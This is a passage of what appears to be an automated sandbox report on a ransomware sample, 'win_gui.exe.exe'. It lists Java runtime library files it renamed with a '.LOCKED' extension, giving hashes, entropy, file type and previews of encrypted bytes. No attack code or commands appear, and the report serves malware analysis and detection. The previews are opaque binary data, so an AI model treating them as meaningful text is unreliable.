                                Preview:O...q.(..1.n..s...<.UW.8U8.H..A...C.....~4..c..K>...qnN..n..v.q..~. .....R....-jG.i(E......R.$...2..P.^.6T....Jw...)....@.pAI......./....1.....m3....C...*V...!k.Z....R.x%....Z..............&...v......7.=.....[.z..f..3....P...l...B.U.ls.>...bkNZ...>..K..W..?......../..,..*....4....5.t......o..!....eJ=..m........._Z.S.I8g....D...I.^*a..M...K.t.....A+I....PlK.)......S....w...'..^,......+.....ce...\|..\.p3.L....v.q.....F....).(J-...;....3.?....- U.....T.....6 .......m.Z...b.2........j+.........>.g..K"ax1....T'.U.\..t.f"....#..@...}.~.,.d...}.s..L..v...Bh..@65.Q.|.......'..:.....1.!....s...ZX}. .m,..-.....q1.J..Y$.!9.I........w.0%P...5.*.....s&...;..\.D3v.lV.d..M..........d.t...!vs..G.....3.lU..|]....F..^.X0..P..K....n."a...Zk5....B~;O..Vb-.eU@...yWa.L(.k.K....=wG....h....fb.z....G.z."a.W.^.zo...Ga.Yz...1UB....F..p........c.....S........R.n...........{....o...=R'.O...f.?.@....4;k..C4E!h......U/x....U.....m...(........[.q.C0....mc.w/Q..R/RX,...G

                                C:\Program Files (x86)\java\jre-1.8\lib\currency.data.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4780
                                Entropy (8bit):7.962269785186108
                                Encrypted:false
                                SSDEEP:96:8Vxv+yDdlKd2/iFzN+ZdUYOz7FpAVHUqFQqZJg+X18KrJ6e/y3R7evuAVOO:S+FWmz0Zvo7FyNUqFQq/g018WgeO+VOO
                                MD5:F24F5D1C4A5FA3FF74A530280E5CCB01
                                SHA1:966D74303C8BC8F31FA4F0FF4550D0976331AA8B
                                SHA-256:2C5E9331D4A538FB4B0B406690DEB227513555C69BF505B543CC2F0F55B47DE7
                                SHA-512:012D4B09CB716425DAFDD932D0D6AA28772F5E70C3736D100F1E90B0A7CF1BAA0768DD5F59650C322CB41194905BF429C60E93EC821102279C399016176AAA91
                                Malicious:false
                                Preview:g.R?...E...v..o.2..W%.......*.b.........O.I.6.W.%.....6.@q.......4.C...{...5}zU\...a.E&..d....m..%.K.n...}...d..x..Q..7.&.gF......Ti...uL.i...........W...d..........v....ny..t.f..-.M.D..P.<........Y.QeFq....m.(s..%fp.+..Z&/....[...-..)^E..`U#........0.Ga..U..zl;.CP..cs..P.$e..R....}.p.k...N.qL.A.w..%.L.n.6Z...z2YI4...Q.5....W......66...._5..>..#....|n...i..e..j.J0.....i./\...O......1.0._..,D.X!K...Gh4vmU.......*O.._....U.<d.CW....G.....F..&e.(...iG.......}......X..:R4..o4.S(A.e7....V.> .3..j.X.uW..e.t^%..I.Xn..hW.z<`...........P>.Q...Y.4..;../.;H. V?.....P....|.......nb..7...&Kd....!.2...xS.>....5.-....q3..S8.9...[pf..c.z.Y_U.....pZ....31..g._.... .]Te...z....G1.........2o$...r.f.9.J..3..r].{+...d$.T...].^.`6....(..qP@!....U...A\..8...=..1.D.xmUhv....,C.#...U ..!8..=au.!..#.[....[.c....FT.uJU[...3.(M!.]..~S..79.....iw..SY..$..]Y.z.]X.8.z...Z..]...j.d. .*.u.V.'..k..)............8/x..rj...........F...IS9,H{G.pU....[...Uy....8.b.W.

                                C:\Program Files (x86)\java\jre-1.8\lib\deploy.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5057623
                                Entropy (8bit):7.176136538023316
                                Encrypted:false
                                SSDEEP:49152:qSY8nhXihl3RJESJ+vH8wi7pmm6q6dlnwT6HYHNY8AFEr7eDCJtL6n:nY8ntifHd+xlnFC+DCen
                                MD5:0F54581D2339F6B7D6D6264127DAAD45
                                SHA1:97ABDAF7730DF2A4B96E29123F905E4FF8644CDB
                                SHA-256:FC07F3A6DB2391E8C6CFF1B08CC154D0A5A573D02A3B93356F473379E4B03E84
                                SHA-512:A8E8FA7025186BF58676CEB7B3F5962F0F132C3932D45207229455B154849B5039416A68245D672DFCE573073D225BACD192C5824C3D86F0E7672DCF43A7A31A
                                Malicious:false
                                Preview:>...y.JS.d?V.rzH...zz..[....`.4>....[..h......6.....T.^W.........~.;..y%....z...-.........]..K.i3$.../.I.C..........~r*.].Coh....S1D..c\.1.UTJ..d.&..LA./.......C....U.............F....&.<....sJ.A...xMr.'=.]DH.....U+.,.Si....~-.....N.q+O.+w....9..<...T.W..6.(.&.).Z.JJ....g..{.w].#L..............B.Mj.b.....f|.r{.)...@...BC.2.&...D.t7u.-.C............?.1(..8"..z.%.-.S...z)N.....&.....T.n.>.y..Q...h..F...%....C|.'....(.!B.m.[.NU.Z.8tvzl~S/......^>xiJ|W)<.7L...v.f..).p..F..|1y.)...L...].eDK..E..^.~~..vca({a~o.u..~.m{.N..<.?.......3..C....~.'&.../l..t6..'q..p.......g..S]...W\.......v.b..:/..........G....._.0m-7R"P.Q....r.FR..Lp.y.F\..\.k&W!.z.m..7.....i....e..{\......lS%)A.A.....m...OA.R..5..........Xq...f=>d..;....\..AI...-KI..Ml..y......e.]....N_.u.....3.....u...-.PI.a.1..\Z...S.R.ES\\..".WO....[..c..'. ..p.G.)V.c.C...2..!.....Z...).o.I."..M'O....@s..]...ZFa.I^CC..F@....Jz..D.p..MLV.....l. ..~...s.# "!.....a.z....+>u@...+..x..+..

                                C:\Program Files (x86)\java\jre-1.8\lib\flavormap.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4536
                                Entropy (8bit):7.951694197960495
                                Encrypted:false
                                SSDEEP:96:Cp7/wwxmJVKSsCYJOb7PdEU6TDXzZocRogIYGkUPq2hZcevuAVOm:Cp7/wwcVKSUJYDsTD9ocjIYnkq2hC+V7
                                MD5:4AC267C53D52802C4B8F4AA92B0C9036
                                SHA1:D13458492CE1184E28E42E5D844550329FD382D0
                                SHA-256:3FE33D986B7C83DAF393A8005EDA5F5BC7B962B27881046773170BEAA073F2D0
                                SHA-512:34AFA55606A5BD2A705284CC8C6A4F802819AA4C92DB3745061803F141DD06BE66FFF726409FDE7D60EAF223CAD8F2882599E4E44EA07390996F291F4C5D9370
                                Malicious:false
                                Preview:.......G.S3......}.q#....RJ..eE......h......j....Qw.^.oc^....bd!.. .M.]mH&.U......w#.E..w...}.....5. P.......U.)..H.....^..L.M~........F.....y/.......,...pbz...,Cj...*.C!.8 . aa..<I..>..S".6.H".v.....re.A.S.[....Fs>";.+.:)a.?=.\.....q$@...w.FE....e.8T7..K...EOp.'.L.B{*.:|..i...<9...DH'...5Hj.0f.....a{*.f2hmh..R.7B...I.qa.....ZW.[.q..7...rR.)...o.....k$T.8.(..`........5..*......qO.*D!..Hd.R..AV..4$.6..%...D.....`........jb.q....[bZ..!x.>.Y..(..~s.....<Nt|'.y...]6.......d......`.G.......w...?.}.I.....$W...`.....}.;..F.I8f.x}.3...&.ju.K#.<.........8...t.....|.V.. .*.5^..E....B.?.k.&n.......}n..C.&.g8..v.j.....u.O..oK...h.~?6[.....:5.........r.~Ii....T$D....w...-;..W..e.UI.4.$.e...}@m>..n..o.9X.....VcC9V..=.uX..Y....?A....m.@L).4..r...........R.z}.E.....,F....<.[.q..l.T...Ri....9.u!]."...h$1.....4z...Z.Kr._c..L...A.A............e.,..]..@........m...]5!....P..>..>.(.0.......Lt.H....X6$_....8)........^o..v\S|.xT~.C.L...P.4..^.sm.;.Lb

                                C:\Program Files (x86)\java\jre-1.8\lib\fontconfig.bfc.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):4386
                                Entropy (8bit):7.961941819748066
                                Encrypted:false
                                SSDEEP:96:PD+6mF0K0/f2knAu6BUaZVTuqghLrzarb7KcZevuAVOn:C62gl6BBZVTuqSDaH7KcZ+VOn
                                MD5:1DBB665A8B7B813F0B5F6A949DFB97E8
                                SHA1:A245F659D33137B1FE5A482DA350B8E380DE81A8
                                SHA-256:8014AC41F95D80CFCE8814FF993701D38EBCE939B1D55EFD516C48A6034B00BA
                                SHA-512:8ED3FD57159ED1D00BDF5F79B911613A84A68F362A81787CA6C055CDF2727B3A423B049289B3919188E7FFCE44537A13D7212E8E05CE3E677C907C326BD4B4B5
                                Malicious:false
                                Preview:.{...qm).&o...?.......V_..Ly..~M.....b..d..-Q..>......)...S...1%-.l... ....&.,V...u.|^c.(l`U....9&.>.'..\..B......&$.1.vCM&=....x6.>..7k.i].<.X....df71..He.....=.t..1.5m.#F.....Fb..=.W ..E./.z..#.E.2M... Zx.Eh.$,S:....T....&.8<.u.`..5.....D8p.N..OF=A.L./{Q|j.*.\......*U:.F.5.1....?.....W_.>tw.ZL....!.m....-......:..j..(..e.=......}.".....Ui.......2...../.'.I.]fy......2..4...Z.....#. ...:lv_/..~.,.............`.6.X.^........9.d...]....t.T.;.`..x.I.e....v.<.V.K.*..}.0.... ...zfa2......,.6.i}.e..'8zTN]Fp6$P.#oH...ea\.w..H$..+e....l...t.<_uySn..ds.5.|.s.0......?c.z.....n:6X.[.8xb.H...u...5/...ty..Le.......r....O\mNO....b0.........r.........d\.e.RSL...amsX..GkJ..3.^..'...+....vlCE..G.....-...6.X..r.}..........H......N..'..y():p.2.F...."V`S{.....~.N..#"x....n.....aA..Z.........T$..f.....{,9$m@$.h:J..$....#........!l....p...r.}.,0<_..<+.p.O....h3..@...6.j........~..2..J.z0..X.M\..(IN/.]wM*....`.l.T$v.j.c/..e..=\.=....u.........v..L.h..2.......dQ.

                                C:\Program Files (x86)\java\jre-1.8\lib\fontconfig.properties.src.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11186
                                Entropy (8bit):7.982934220941608
                                Encrypted:false
                                SSDEEP:192:+NI702cN8CCWePl8Xm3KM+QDrH4V7l+OpOMZuGA3rk5jK9WK4QfUkHkhUfjpt37j:eMAePM0KNQDTO7AQO+3+8K9WKbRkSrzf
                                MD5:4FF2BDEA1A10678223B0B26106D9CF24
                                SHA1:BA9CC7C4D5EF74F984408398C061E95E3203CCF2
                                SHA-256:DA2373436906972D17404D0BDFD75E47D4839ABB954D59E30658FD891D25E44D
                                SHA-512:9CD4F026A923D1536DEE8EEEAAFFBFB1D45930D763E13128D79EFD5F796D293912666D1A2B8808FA1B9B246EC00008F59BF058003A00B8B1A57DC606F60BEA34
                                Malicious:false
                                Preview:@#0~..]...H.X..^.<..L..>e.cM)....t.6.e..3..(2tj....Z..<..(_I....?....&.B.e..!.C.+..X....A+WB.s>...G8......g}Qc3J.DI....C.5.$..|....K<.-]yrpM...v..f..........O.C/..X..J...e.my...a.....")...n.j%_...)..z...."^....#.vJ..h.J..S....p.-.:aR...M.H....G..QWM........q..6FB....J.*..Ogv.Q;....S.=Sm&.Y..P......*....+..O...AW.s. J...b.T:.&.....2CxF...R/...d.D-.%*v.k.sx....^Y.....t..<^....*..8)Z..w.7..N.o.........D.K......v.X...b....R....lC...X..9..1.).u]...1.:...6mU....{.../.|..&.d.;......{.%..?...n.s....rj.p\8...$........NDO.....N.o.0X...tl.V..52].. ......Gkw..1~....m.s.....1.....Z.|c.8..n6{.....s.K...GxDin...Hq..`*..]D.n..A.(.2_...........F.....|.(.!.a`.A4.. .S.......lTg.c'.E..gAE...[..#....j.|./.......6..9..\~:hv.....f.._.E.;..........}R.}\...T..Q.....n..N.a....Ai....M.....:L.<Y...d&^...`.<.y=.(..v.p.....+.Yv..o4...T..S..Qg...1.1.K[..P....+.x..f$...y.M...//.../.M.Qlr.....j.&S.P..5w....q.}....Q......%.{...M..1`.l..4. 8..#H....@.8.r6.Cc..4.00.h.4.

                                C:\Program Files (x86)\java\jre-1.8\lib\hijrah-config-umalqura.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14570
                                Entropy (8bit):7.987220077995155
                                Encrypted:false
                                SSDEEP:384:jiDQE9lvFW0QEDo6mP7s9UqPddlCxX63yWaJzMw+VOA:ODQElB07smwHfydp8
                                MD5:488612BC3597392B442D858A2571A396
                                SHA1:A9A63A4FFA4451D4C54152C6819D0F67E79E469F
                                SHA-256:92802D6A2D1DA0FAD81C4F7BD39CCB1CA8DA289C2A570F6ABC5D902ECFA86A31
                                SHA-512:AEE297B3526134CCAD0E8A416619011EBF2F6C0DE2E5C4A4F4AB072591F6F8949EDB00179D455B7DD5C1423FAEF56FEBF060F598B1999E483E585A314B142408
                                Malicious:false
                                Preview:.qz.e.Y.:......@.....U......2..lj..~.Qs"...1.qt...i,.....QW.....r-.28$..Mp...5.c.gN.y..6(.[..5$U.(%".%-.6.....k..%./).y...Y.-.....+klq....2..$....\]#..2x./.X..s......+.......R.........C.."2....>.N..q.Ee....]#..E.....f:..".....u.....%I....rzS..>Yi@....86!y._.Np.T....\#..T..Y..,[6..X.+b....s.v....J8..!Sb.Z..$.9.Y~=..B.9..w1.$....w1W.v.B..u...|.E\..r}...U..{...ok|...E....^.$...|x1.M....m5..\..9.Z..Kc V...D.G....(_.....D6...K..d.H`&i.5.:..;...s.s...h~V.zI......k..t.F^...l.........~.~..#.u..en0..<.BJ,'..x.&..F<.q\.e.e5.....>......G.U..q)r.Q..*.A.q..k.0..<V..>K6.B..L.{..h:......EV$..z..l...TL....I9SG.$...3..K<....y.B...H..'Q.!z0.=r.c....6..8.......c..u.T..l.Z....:...7...`..@...(/.?..ZQ.G.@./.Lah3...No`u.H..C..\.v.=....B.j.3...K....Q.f....).}5T]1j~.....$(|.v......._l.|.]....1k...Ya...(..2...z..I.....0..@.W...w..j.......o..H.#l.,.9.J.k....d.#..C.ke",......`.,U.X......!..3U. ..w..S..].K..:5..Y..y......c[\.3..gwU,..=......J5. .Cw...?}...

                                C:\Program Files (x86)\java\jre-1.8\lib\javafx.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):664
                                Entropy (8bit):7.631467939639301
                                Encrypted:false
                                SSDEEP:12:xuVbsYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWOZOs9NXzku:xqbz/wpDyYPGTNj0hOHAVMJg6WXs9R
                                MD5:AFB7F2A0A80F3EDC66547A5A75404FE2
                                SHA1:05C80EA77275446A9AD195F676F6196C88ECDE15
                                SHA-256:D71451C54269270450E50049FBF4EF612A3386721AC98FE9FC5BAC975FC8EF1B
                                SHA-512:63676FC458BEFC7B79871777DA3C676E78DA1CBA9B3C0A9DBD9FD9F25E3B0480F32CB93FA8A0903FCFE854E4BD4828C5D15B92A55721C0A0AD80FFD277ABFC88
                                Malicious:false
                                Preview:"...|.....31..`.K*.2.He..."x..../e....R.T...[V.B.D=.le...}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N...;.`..k.....B...iZ......q.9}.."8...................fk.W...f

                                C:\Program Files (x86)\java\jre-1.8\lib\javaws.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):957531
                                Entropy (8bit):6.9462170581160505
                                Encrypted:false
                                SSDEEP:12288:OCdYnv+0yKb9a2LtVoiYEN5eNS3rjZpNlBsZACAaiYtJ+KQ:OCdYnvnhtVojENUNYJRqKNVYjQ
                                MD5:7FBB29A6FD4C0C2B315095ED890BF113
                                SHA1:9EF79E9A8E5AD34FFF724326A398D8A987F29832
                                SHA-256:B2C3A2E0B94F6245FBA061156377D2D182A52644C783F97275354F4AA8794097
                                SHA-512:90E23588E84647CFEFE8A137F1B15E8C83F471B53A3C487A1E3B60C590FB1DF6931DCAA653A86113006CF4040008B3956CF1FEE1DAEB4C5B3E0082637DB56C7A
                                Malicious:false
                                Preview:.....9."rS......o..+.@3M.........5......T..rHLC...^.j...9...o*=.......3....^.,.r..qK. y.?.*-.....T..8.w......Z.sE.D..hb.Sp....t-^65.....\...f...# ........G....M.>..a!v$.A.&;..#...L?B.Xn.qw.bZ..u.8.#......}\...h..}~2.}e.5Ad]....=A}B..-.....a..=.Q........PWW...2>..9...x.W.W...v.x!.V-......-.Mn.....h.........Gm..hT..Av...1.F.k..L..V...Q.....".*.).....>;*..\.........;.(.N.).d[...._....z.....a.<X...i...i..b....1>*qT.K<..u....A....3....<...y>).....1.D....MP......4.R^...gO..H..xk.cu.aD..<.}M+gY'..Q....M7.l...K...A.tA..YY...7.. .:^....X....^a.s.]D....-./'..~...pKOR..o..P%.S`.A....N?.@Z..V..|E.a......\.%...+W.3./....4.L.a...,...E{M..<.QF|A.S.......[.B!=j.!?.tF....f....l....n..\u..p......eu4.8...<..6.yJ0....A...r.(c..iG....H.G..5..........@(.A%|....Q?...z...g.VWQz..5.....0..Cs..M-.#.n.....c.c....U..Q.[.(...S%x.e.,.....e..P.SC..U0T..mL..<.l.(.b1N...O.W....o|VR...w..../..G..z...u.|..k.......W........][...0.\f......C$y.U.L.F).$'(.2..o.|...QG...8s...

                                C:\Program Files (x86)\java\jre-1.8\lib\jce.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):123332
                                Entropy (8bit):7.998743784494614
                                Encrypted:true
                                SSDEEP:3072:Rh30YPzWp+n0xUC6H2rxRZEBE/yykOze1b7D5bI4YB6:fkYbWplUVWrxR4ckOzIU6
                                MD5:36973C84B92D480218179D65882EB4E7
                                SHA1:FC1EC1CCE74F225C2BAB4222DB67807E17396E47
                                SHA-256:4B4AD29B53A483D89F8DED8FAC2A3D9074C73AE005C634D601175729007E9958
                                SHA-512:041908DE1C2139F3DBA33BB77E52494AA778B6C1C6F02A2871E5C58B98DEC429FCA76D9616D2370E4A9320A89633CB13A9FB83B0654C5EF935939E2852CC979E
                                Malicious:true
                                Preview:6.....noL..c.....].%...\.WR....g.F5Jg....T_...HE@..Q..J..Cjl..6mu.?...F6.#..P~.t.... ...^..V....YK*.u.A?Z.<.m..;..I....2....mi"=x_..l......<.JB.#....)wV.G'DG.P..&.M.....9............iW\-)[..E5Cna#o.%..~.....SF.*,L....s1uWi7....y.Z.....s......U.pBF.>..+.C....=.o......G..m..0.Zw,. ...A..{G....u@...f...<<..q..j.;...U[..............3U...%.#.o..(!W..g.P.`j...C.gj.....e6...T....=...-mc[....n.....+..u9.......ZD.m..E.:.e&CO.^..$........y...?..5.....d..!......7.O..|..,..L..J.a.....1^`dlX..X...M. .U>|=e.N....$....'..>......2_...I...2*............_}.../.=5E.M...a....q8.Og..[.t.......UI..S.F!<.......[Z..`.w.....w...@1.X.&q...E.7.~..y]A.i...\..`V...8.^.xhD..0.,I..3...=u.).5..=r.!.....L.A....C...M1....Hj:.......U\!..a.R.@...u^v.W~.....*..?..5..j.~..an........z.t.f9E.3...1...k.T.4j.%..t..t.._R.3H.ra5.sI.z.i ......B..B{A......m....Zq....5.-b....-......g.....Tf.[....W.0....8./...n..,..0...q...T..n.xB^U.F..=.JB.t3X..}...b.L.....m...:.RC.fF.U..AX..

                                C:\Program Files (x86)\java\jre-1.8\lib\jfr.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):574879
                                Entropy (8bit):7.4128984671385965
                                Encrypted:false
                                SSDEEP:12288:cYPid0Ya9+zrfx5l+qU67FYWg+YWgYWeoXqgYSqYQh2f/m5NwaHkSIJHvWQ6Q7o9:cYqdza9Krfx5l+qU67FYWg+YWgYWeoXw
                                MD5:59B870ABDE86B6D7561CFE135185A400
                                SHA1:22694627B5F29A75F5A54684EF11833CF7AC9479
                                SHA-256:E69A23BB3F50355B5446E6DA0E2CC272D24D91CEC1384C8265C2DBACB6FD0867
                                SHA-512:A286BB19A7B69EE2A98B1415079E11275FFC3E710DCA9F9561156CA40BF73B1C4366F306CE32535D3005214943A0BFF9870F272648F53B04AB253CD82B0F18A2
                                Malicious:false
                                Preview:...........Z,c.".f....Id...."..P....>5...+..^.j...^Ww..I..V.}8..".B.....JKS-.m.`....1us..Vr.........ES..D.B".&n.l.../.8...Y..e.&..)..X0.....>e.."~.us......yF...:tWv0/P.%Au..\.Rga... ..5.2^.Td........F*....{cJ....}..n.0..8..r...L.X....L....\TG.qL...L.o.>...5.'.`.2...g...9D:..V.2n...J.]C.K..b.}..G..<I.........'......[...W$...#.`.....j..$...(..$.....5....f.{OT....O...EM...H.oI?|2f.t1>n...euN.&..y...{_.|.7..<....6...L...4".g~.l.ia.LB....\_P).).,'.o.dp}...W.6..x[.Z;.S.&.7S...i..6}.M..f..!....u...g.G....R..l..p``.A ..i....A..L.Vg..jhfr.5.G...j.3.EcX..|.f...t.T].r...:.sq..B......8....Bo}...)..]$.WX..*.._{....(...8......lq..D.S[.....}..........H..Gh......G.-..Oygq.RcT......Wp}Uh..P./I.^..4q.3QU...H.......<.... .6t.2.7.M#F.....:4.>.x],C...].T...u..J.....b.N..Z./...G.'.D.+..k.../."..-_.L.......?Z..#})..{X].o#.@.L.Z.A.5..'D...VG....d.....x5.8..<\..>.e...'....C..m...[.....E".|VD.....a.....1.v.E...$7zUS.w.tC..&X...*.xM..8..[.@p._P...n!.2..9v.."..

                                C:\Program Files (x86)\java\jre-1.8\lib\jfxswt.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34526
                                Entropy (8bit):7.9945329385042125
                                Encrypted:true
                                SSDEEP:768:RBTqjwOEDasOaNYmm1MWjlzBIHFKdexPAmpqpC51Hv:R2qGHcYeWjZ3gxkYP
                                MD5:EFAD53837D78671D0F5A0172242812BF
                                SHA1:2A9EE651E913F77FB167C58394050F38DF228AEB
                                SHA-256:E38331B04D6D9B26C54145507AB3D71815FD4D8A244BB7F2FD2F622328F8AB3D
                                SHA-512:D6409AD7E4F461652177CE5D5C2BA6EC43E7EC0AB8731B5A5FF20F3760649467B6E455ADDC085A43CD10C9F9CBC03C4593495081B03536135076310DD48704DA
                                Malicious:true
                                Preview:Z%.@..im%.[.?s...BO[e.......=...XZ.a......+..l-..28X/O.../ZQC.8.e...........uC...V<..E.Ab>.t.t..o8@..+..q..X.:hL'..........\..=/....I.=nnn........L.H.....j.U..l..fY..0.....M..<. .BU..0.......GV....W.c.c.7\.J...7....)`. .~..bQ;f.U..&.../7*.-l.=.V..TF.l...M.MI.MN ...].T.g...D.i|.E?._........G.:..._/.(..........[.......Z$......i..?...V.....P.....7...3....\l:Y./.....V..s0_S.b.0D..W.a..]..N.+.J%..L.As..i.|.[....S.R.....Q(..........}.8.Vc.zp...dl[b..5....'....j..i.a?.H.f.?q.y(\...J_t.)4....f....-..%e..........S.....Il.|'Y.g....%..6<.48.r.B@..dW.....9.^|..'&l...........6......Z.s#h...q.......Z.DL.l?C....e.`N...h.......L...u;.O....S..J...D..;........E0..._.Cs5.%2..t..f&..r.y.1.1.X.....0..ru$.....;m...9.W.,|..R..n9.pnk'..G..q.?......=E.u.n.p"./)V.r..t.Z.xX4..../..Zy...6...K..f.....&....jw....nt....,g./.!.Wp.H..GN...w.L..Yl..3......de6.q...2...pq...*I.E..56.#I..d......ZI..U...y%P`.#.6.N..p....u.9S....l..j....;c..?..v....X#.....u

                                C:\Program Files (x86)\java\jre-1.8\lib\jsse.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1790929
                                Entropy (8bit):6.8459507684295735
                                Encrypted:false
                                SSDEEP:12288:KVy4Mo70l8djm0Ru1G7Yc/oUu4BrOp66Xe2bmfi4yRPwkC3Dc0nNXHA5LyIhIhJ:KVy7o7/tR4G77u49OpTnbUeJCAsCy2I3
                                MD5:07299C9F08C41BC09DAE4C8D6D5B544E
                                SHA1:869501374AEC16076FEF5E4D0B711A69E8EEA973
                                SHA-256:41CA171AFEB6FDFCFDBD4667753A34C96C52DAE0AF0E0E6C62A3E8EF5ED2BFB1
                                SHA-512:8BFA66C84A2C1F35106540EABD9436997ECCB1F21018ED2E858C5DEF6BA4646A0A29097C9405AA97A44A2AC27ECD19744AFE8B34AA24F3F81F0C45BA1E72F944
                                Malicious:false
                                Preview:RX;.aD.=.W~...w.J.'...Pn.a0.<Z"?,..K...bX...1!...e....o....".\..#4.(k.....=.7#..AC.,.}..QPj.^N2P...#m_..6H..J[..%.#...h.X.0.$Z..........2U..".,..0......1Y/.6.m.0......?..5*~C......]..q}c.....V.t1..-...0*..t..E..~.-I.LB%....!..FE.R..km..U+bx(.m.Ft?Y..H....P#t'....z)VZ.F7...^.X$..=...V.U.&.....@..Vc...WKD.J~./..g.#.E..G..u(...#.....]n;..1...h..../9J.C...0.!..N.}....E!3 !L..z...q...>O...U.!g.....ps.o..... Fa:5....J%.!.l^..q&...~..Q.O.k....c...Q.........S. ...AnN w<.+5G.*.z.^.._.!..i.!....! .........3.YQN.7.<..+......)......5..D..|..@/x....6...:).6H.?.......b.cK.4.....;.aO.'a...5.~.3..V0..#..=.1>;.2.8..+.Y....................%.p....8.ds...7..n..RZgQ.......O.3Q..ED...............e...i..p>>.J..,.....T.."?.....7<...GF..\.......U.D..reN.QY._...8......W8ph...4jWD.7...u.x.)R..{....w....y.>.%g..].t.....:..$-..9z.-r|...c@.Mg\..\....u6)..:..ZZu.EA..P..........`6.........9.?.t... cP...B.s.Z...>0A.Q.....$.;..&..L*.vo..d.......`.w./;...X...xf..

                                C:\Program Files (x86)\java\jre-1.8\lib\jvm.hprof.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4834
                                Entropy (8bit):7.954143588502139
                                Encrypted:false
                                SSDEEP:96:nz8F43Czajp58FwL9tooXgGW+GvNbkY5NMMeKGzCdGevuAVOvA:nwF4ZTSw4OgGYFjN7eFGw+VOvA
                                MD5:6F5C8EE85BA36B2FA04276EE73F8239D
                                SHA1:049D10085A86597C309F2FE4C762227D750DB5B3
                                SHA-256:B11DF0A06FD492A2ADA95902952351A71802522932BE736920BAF3D709D81768
                                SHA-512:3612CCF0F1923C24F907156577A7108D83CC27DD3DFC10CDCD2E17F0BD52D94CEDD4829C1E79B94009D02E3D563270E481AF43F02118D0BD227CE49ABCA4E797
                                Malicious:false
                                Preview:.Y..dV;.....l....I.T"f."{...2.8o....y7.....h...6..9Y....o&.....hi.J..<...J..*...c...E...1...x..[.hO.}.....$L..Z...5.._.(...o.u..S..{*9.q*....^.4H.u.2.....d.@..u........0....sC"3*{..X.&).....R.Ae#....n..gV...T....>..h..L.......<...}..C...A..*..E.....;R.0...2..<n|3..7.,.i......f;..q9.......J.)YE.Wd.D.b..".N4.^*@.....%q<....y....i....7..3.p..{t..%T.5..tQ;.Q..) .......8.Q.=..T...<Y.......l........v..nc.W...g.........TF.n.u.i.K[.yb... K2..Q{....5......1w..M.... @.-..2....$..W.}.{Y@...G.....:'.]B.......>.fy6/.3._F..]...I..c.x..3.S|..%.=..6VL,..".C...pK.&l.]...qZ.0.N..G... !&H.....O.)b...P...b.W......l.n....D.....0.f.1..%..q.].b.....@.....nau.|,>1h.17`..8.. /.......qG..r..!.zP9z......z..=pM....#..(.x..*...........C..r.P..E.e....mr.y.2%..u%:.'.......&\y...2w..jD..W.@.vLN.1..'...v......qH..e,M.!`#..B......KyK=^4.>1..y.i>.eU...A'.......F.:)..~....P...}.X...-P.^...S.?.i.......n.....\d@U.1..3.`v.C'9v,uH.B...aZ...7.4.I.}........c.LP.;..

                                C:\Program Files (x86)\java\jre-1.8\lib\logging.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3063
                                Entropy (8bit):7.944445303369046
                                Encrypted:false
